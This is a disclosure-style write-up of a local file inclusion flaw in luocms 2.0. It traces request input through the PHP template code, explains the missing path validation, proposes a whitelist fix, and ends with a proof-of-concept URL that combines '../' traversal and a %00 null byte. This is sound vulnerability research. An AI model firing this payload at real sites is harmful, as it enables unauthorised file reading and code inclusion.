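/*******************************************************/
/* luocms 2.0 Local File Inclusion Vulnerability
/* ========================
/* E-Mail : 681796@qq.com
/*========================
/*******************************************************/
/* Welcome to https://www.90sec.com */
/*******************************************************/

// 1. Start with the front controller (index.php). Every request parameter is
//    read through getvar() (not shown here) and handed straight to the
//    template engine; nothing below validates $act before it is used as a
//    file name.
<?php
require_once "inc/const.php";
$id  = getvar("id");   // see getvar() for how request values are fetched (not shown)
$fid = getvar("fid");
$cid = getvar("cid");
$act = getvar("act");  // attacker-controlled; becomes the template file name below
$p   = getvar("p");
$p   = !empty($p) ? $p : 1;
$p_l = new cls_tpl();
// $sitepath is not defined in this file; presumably it comes from inc/const.php.
$p_l->tpl_main($act,$id,$cid,$sitepath,$p);
?>

// 2. Follow the call into cls_tpl::tpl_main() (shown out of its class).
//    $act only goes through get_tpl() before the resulting path is loaded
//    and, per the original note, included by get_include_file().
function tpl_main($act,$id,$cid,$sitepath,$p){
    //$stime=microtime(true); // record start time
    $tpl_addr = $this->get_tpl($act);            // builds "template/<act>.html" from $act
    $temp = $this->load_tpl($tpl_addr);          // body not shown
    $temp = $this->get_include_file($temp);      // inclusion happens here (per the original writeup; body not shown)
    $temp = $this->get_sys_tag($temp,$id,$cid);
    $temp = $this->get_list_tag($temp,$id,$cid,$p);
    $temp = $this->get_url_path($temp);
    $temp = $this->get_sort_tag($temp,$id,$cid);
    $temp = $this->get_title_tag($temp,$id);
    $temp = $this->get_sitepath($temp,$act,$id,$cid);
    if ($id != ""){
        $temp = $this->get_content_content($temp,$id);
        $temp = $this->get_prv_next($temp,$id);
    }
    echo $temp;
    //$etime=microtime(true); // record end time
    //$total=$etime-$stime;   // elapsed
    //echo "<br />$total times";
}

// 3. Follow the call into cls_tpl::get_tpl(). This is the vulnerable spot:
//    $act is concatenated into a path with no character filtering, no
//    traversal check and no realpath() containment, so "../" sequences in the
//    request walk out of the template directory. Note also the bare
//    $GLOBALS[templatedir] / [rewriteext] / [indextemplate] keys: on PHP < 8
//    an undefined constant degrades to its name with a notice, on PHP 8 it is
//    a fatal Error.
function get_tpl($act){
    if ($act != "") {
        $temp = $GLOBALS[templatedir].$act.$GLOBALS[rewriteext];   // "template/" . $act . ".html"
    }else{
        $temp = $GLOBALS[templatedir].$GLOBALS[indextemplate];     // "template/index.html"
    }
    return $temp;
}

// 4. The values behind those globals (from the config file); only
//    $templatedir, $indextemplate and $rewriteext matter for the path.
//    //$GLOBALS[templatedir].$act.$GLOBALS[rewriteext]; -> look at the assignments
$installdir = "";
$templatedir = 'template/';
$databasePrefix = "luo_";
$indexname = "LUOCMS首页";
$indextemplate = 'index.html';
$httpurl = "https://127.0.0.1/lUOCMS_UTF8_V2.0.101201/upload/";
$defaultext = 'html';
$sitepathsplit = ' > ';
$titlepathsplit = ' - ';
$rewriteext = '.html';
$author = "Admin";
$source = "本站";
$site_beian = "123456";
$manager_email = "admin@luocms.com";
$sysversion = "V2.0.101108_UTF8";
$issetup = "0";
//ok

// 5. Suggested fix for cls_tpl::get_tpl(). Allow only a plain template name
//    (letters, digits, "_" and "-") before it is turned into a path; every
//    other value, including the empty string, maps to the index template.
//    A positive character whitelist is preferred over stripping "../"
//    because it also rejects NUL bytes, encoded separators and absolute
//    paths. Quoting the $GLOBALS keys removes the undefined-constant issue.
function get_tpl($act){
    if ($act == "" || !preg_match('/^[A-Za-z0-9_-]+$/', $act)) {
        // Invalid or missing action: never build a path from it.
        return $GLOBALS['templatedir'].$GLOBALS['indextemplate'];
    }
    return $GLOBALS['templatedir'].$act.$GLOBALS['rewriteext'];
}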
Result: the template path is `template/$act.html` and `$act` comes straight from the request, so the file name that reaches the include is attacker-controlled (path traversal → local file inclusion).

PoC: https://www.luocms.com/index.php?act=../upload/file/3.txt%00 — get_tpl() turns this into `template/../upload/file/3.txt`, i.e. `upload/file/3.txt` under the application root (presumably a file the attacker has already placed there). The trailing `%00` is a NUL byte meant to cut off the `.html` that `$rewriteext` appends; PHP rejects NUL bytes in include paths since 5.3.4, so on newer versions the traversal still works but only reaches files whose names already end in `.html`.